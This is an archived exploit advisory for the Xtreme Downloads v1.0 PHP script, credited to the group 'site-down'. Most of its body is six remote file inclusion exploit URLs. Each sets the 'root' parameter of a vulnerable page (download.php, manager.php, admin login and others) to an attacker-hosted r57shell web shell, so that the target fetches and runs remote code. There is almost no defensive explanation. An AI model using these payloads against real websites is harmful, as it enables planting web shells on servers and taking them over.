TUCoPS :: HP Unsorted X :: b06-2745.htm

Xtreme downloads v.1.0 multiple file include exploits
Multiple file include exploits in Xtreme Downloads v.1.0
Multiple file include exploits in Xtreme Downloads v.1.0


Multiple file include exploits in Xtreme Downloads v.1.0

script type : Xtreme Downloads v.1.0
bug found by : sweet-devil & black-code
team : site-down
type : file include

####################################################

exploits :


download.php

http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt? 

manager.php

http://www.example.com/path/manager.php?root=http://yoursite/r57shell.txt? 

/admin/scripts/category.php?

http://www.example.com/path/admin/scripts/category.php?root=http://yoursite/r57shell.txt? 

/includes/add_allow.php?

http://www.example.com/path/includes/add_allow.php?root=http://yoursite/r57shell.txt? 

/admin/index.php

http://www.example.com/path/admin/index.php?root=http://yoursite/r57shell.txt? 

/admin/login.php

http://www.example.com/path/admin/admin/login.php?root=http://yoursite/r57shell.txt? 

####################################################


#######################
emails:

gamr-14@hotmail.com & black-cod3@hotmail.com 
#######################


All my respect to our friends , lezr.com , g123g.net


done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH